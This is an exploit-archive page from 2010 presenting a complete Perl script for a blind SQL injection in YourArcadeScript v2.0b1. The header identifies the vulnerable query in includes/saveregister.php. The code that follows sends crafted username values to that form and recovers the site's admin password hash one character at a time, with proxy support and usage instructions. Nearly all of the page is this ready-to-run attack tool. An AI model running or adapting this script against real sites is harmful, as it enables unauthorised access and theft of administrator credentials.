Home / os / win7

YourArcadeScript v2.0b1 Blind SQL Injection

Posted on 28 May 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>YourArcadeScript v2.0b1 Blind SQL Injection</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>========================================================= YourArcadeScript v2.0b1 Blind SQL Injection Vulnerability ========================================================= #!/usr/bin/perl use LWP::UserAgent; use HTTP::Request::Common qw(POST); use Getopt::Long; # #'#/ # (-.-) # ------------------oOO---(_)---OOo----------------- # | __ __ | # | _____/ /_____ ______/ /_ __ ______ ______ | # | / ___/ __/ __ `/ ___/ __ / / / / __ `/ ___/ | # | (__ ) /_/ /_/ / / / /_/ / /_/ / /_/ (__ ) | # | /____/\__/\__,_/_/ /_.___/\__,_/\__, /____/ | # | Security Research Division /____/ 2o1o | # -------------------------------------------------- # | YourArcadeScript v2.0b1 Blind SQL Injection | # -------------------------------------------------- # [!] Discovered by.: DNX # [!] Homepage......: http://starbugs.host.sk # [!] Vendor........: http://www.yourarcadescript.com # [!] Detected......: 21.05.2010 # [!] Reported......: 22.05.2010 # [!] Response......: xx.xx.2010 # # [!] Background....: Our script has features that other scripts have but ours is # FREE! YourArcadeScript is a free arcade script, but can be # used for pictures, youtube, or other media files. # # [!] Requirements..: magic_quotes_gpc = Off # # [!] Bug...........: $_POST[&quot;username&quot;] in includes/saveregister.php near line 3 # # 03: $username=$_POST[&quot;username&quot;]; # # 11: $res=mysql_query(&quot;select * from user where username like '$username'&quot;) or die(mysql_error()); # if(!$ARGV[1]) { print &quot; \#'#/ &quot;; print &quot; (-.-) &quot;; print &quot; --------------------oOO---(_)---OOo--------------------&quot;; print &quot; | YourArcadeScript v2.0b1 Blind SQL Injection Exploit |&quot;; print &quot; | coded by DNX |&quot;; print &quot; -------------------------------------------------------&quot;; print &quot; [!] Usage: perl yas.pl [Host] [Path] &lt;Options&gt;&quot;; print &quot; [!] Example: perl yas.pl 127.0.0.1 /yas/&quot;; print &quot; [!] Options:&quot;; print &quot; -p [ip:port] Proxy support&quot;; print &quot; &quot;; exit; } my %options = (); GetOptions(\%options, &quot;p=s&quot;); my $ua = LWP::UserAgent-&gt;new(); my $host = $ARGV[0]; my $path = $ARGV[1]; my $target = &quot;http://&quot;.$host.$path; if($options{&quot;p&quot;}) { $ua-&gt;proxy('http', &quot;http://&quot;.$options{&quot;p&quot;}); } print &quot;[!] Exploiting... &quot;; go(); print &quot; [!] Exploit done &quot;; sub go { syswrite(STDOUT, &quot;[!] Get Admin Password: &quot;, 24); for(my $i = 1; $i &lt;= 32; $i++) { my $found = 0; my $h = 48 ; while(!$found &amp;&amp; $h &lt;= 102) { if(exploit($i, $h)) { $found = 1; syswrite(STDOUT, chr($h), 1); } $h++; if($h == 58) { $h = 97; } } } } sub exploit { my $i = shift; my $h = shift; my $url = $target.&quot;includes/saveregister.php&quot;; my $inj = &quot;_#1337#_' or substring((select password FROM settings limit 1),&quot;.$i.&quot;,1)=CHAR(&quot;.$h.&quot;)/*&quot;; my $req = POST $url, [username =&gt; $inj]; my $res = $ua-&gt;request($req); if($res-&gt;content =~ /Sorry username exists register again/s) { return 1; } else { return 0; } } # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-28]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP